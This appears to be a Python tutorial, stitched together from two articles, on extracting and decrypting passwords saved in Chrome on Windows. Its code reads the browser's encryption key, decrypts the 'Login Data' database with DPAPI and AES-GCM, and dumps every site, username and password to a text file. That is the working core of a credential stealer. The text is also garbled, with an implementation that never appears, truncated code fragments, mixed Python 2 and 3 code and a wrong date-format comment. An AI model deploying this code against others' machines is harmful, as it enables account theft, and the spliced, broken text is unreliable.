How to Extract Chrome Passwords in Python?
In this article, we will discuss how to extract all passwords stored in the Chrome browser.
Note: This article is for users who use Chrome on Windows. If you are a Mac or Linux user, you may need to make some changes to the given path, while the rest of the Python program will remain the same.
Installation:
Now, Let’s install some important libraries which we need to write a python program through which we can extract Chrome Passwords.
pip install pycryptodome pip install pypiwin32
Before we extract the password directly from Chrome, we need to define some useful functions that will help our main functions.
def chrome_date_and_time(chrome_data): # Chrome_data format is # year-month-date hr:mins:seconds.milliseconds # This will return datetime.datetime Object return datetime(1601, 1, 1) + timedelta(microseconds=chrome_data)
The chrome_date_and_time() function is responsible for converting Chrome’s date format into a human-readable date and time format.
Chrome Date and time format look like this:
'year-month-date hr:mins:seconds.milliseconds'
def fetching_encryption_key(): # Local_computer_directory_path will # look like this below # C: => Users => => AppData => # Local => Google => Chrome => User Data => # Local State local_computer_directory_path = os.path.join( os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "Local State") with open(local_computer_directory_path, "r", encoding="utf-8") as f: local_state_data = f.read() local_state_data = json.loads(local_state_data) # decoding the encryption key using base64 encryption_key = base64.b64decode( local_state_data["os_crypt"]["encrypted_key"]) # remove Windows Data Protection API (DPAPI) str encryption_key = encryption_key[5:] # return decrypted key return win32crypt.CryptUnprotectData( encryption_key, None, None, None, 0)[1]
The fetching_encryption_key() function obtains and decodes the AES key used to encrypt the password. It is saved as a JSON file in “C:\Users\\AppData\Local\Google\Chrome\User Data\Local State”. This function will be useful for the encrypted key.
def password_decryption(password, encryption_key): try: iv = password[3:15] password = password[15:] # generate cipher cipher = AES.new(encryption_key, AES.MODE_GCM, iv) # decrypt password return cipher.decrypt(password)[:-16].decode() except: try: return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) except: return "No Passwords"
password_decryption() takes the encrypted password and AES key as parameters and returns the decrypted version or Human Readable format of the password.
Below is the implementation.
Steal Chrome Passwords and Decrypt with Python
Let’s take our previous Python code that we used to analyze our browsing history and tinker it a bit to steal our own passwords from Chrome’s local storage. If you are a person who stores passwords in browsers, then this could be a little revelation to give you a reason why you should not leave your machine with someone else.
Database
Chrome stores a website’s username and password in an SQLite database named Login Data . The tables that we are interested in is logins and the fields we need to fetch are origin_url , username_value , password_value .
The following code will connect to the database and do that operation for us.
Credentials
Now that we have access to our database, let’s fetch all the data into login_data and then store it in a dictionary credential . The URL would be the key and the username + password tuple would be its value. But before we do that, we need to decrypt the passwords.
Decrypting Chrome’s passwords
At this point, it is worth noting that this is exclusive to a Windows machine. So, Chrome uses Windows’s API CryptProtectData to encrypt all your passwords using a random generated key from your session. Which means, technically, the only way you can decrypt it is with the same user logon credentials on the same machine using CryptUnprotectData . So yeah, your Windows is the one that is encrypting your passwords here! You’ll need the pywin32 module installed to import win32crypt .
This following code fetches the data, decrypts and saves the URL and credentials in the credential dictionary.
#decrytping the password for url, user_name, pwd, in login_data: pwd = win32crypt.CryptUnprotectData(pwd, None, None, None, 0) #Tuple credential[url] = (user_name, pwd[1]) Writing your username and passwords to a text file
Now that you have your decrypted passwords, all that you have to do is iterate over it and write it to a text file. Or simple, you can modify the following code to print it directly to the prompt (Just get rid of the text file parts and swap the write statement with print).
The following code writes the data to a text file.
or \n[>] ") if prompt == 'y': with open('pwd.txt', 'w') as f: for url, credentials in credential.iteritems(): if credentials[1]: f.write("\n"+url+"\n"+credentials[0].encode('utf-8')+ " | "+credentials[1]+"\n") else: f.write("\n"+url+"\n"+"USERNAME NOT FOUND | PASSWORD NOT FOUND \n") print "[.] Successfully written to pwd.txt!" else: quit()
Swoopy
Here is your complete code to proudly steal your own passwords from Chrome using Python.
#decrytping the password for url, user_name, pwd, in login_data: pwd = win32crypt.CryptUnprotectData(pwd, None, None, None, 0) #This returns a tuple description and the password credential[url] = (user_name, pwd[1]) #writing to a text file (CAUTION: Don't leave this text file around!) prompt = raw_input("[.] Are you sure you want to write all this sensitive data to a text file? \n[.] or \n[>] ") if prompt == 'y': with open('pwd.txt', 'w') as f: for url, credentials in credential.iteritems(): if credentials[1]: f.write("\n"+url+"\n"+credentials[0].encode('utf-8')+ " | "+credentials[1]+"\n") else: f.write("\n"+url+"\n"+"USERNAME NOT FOUND | PASSWORD NOT FOUND \n") print "[.] Successfully written to pwd.txt!" else: quit() This post was first published on May 25, 2016.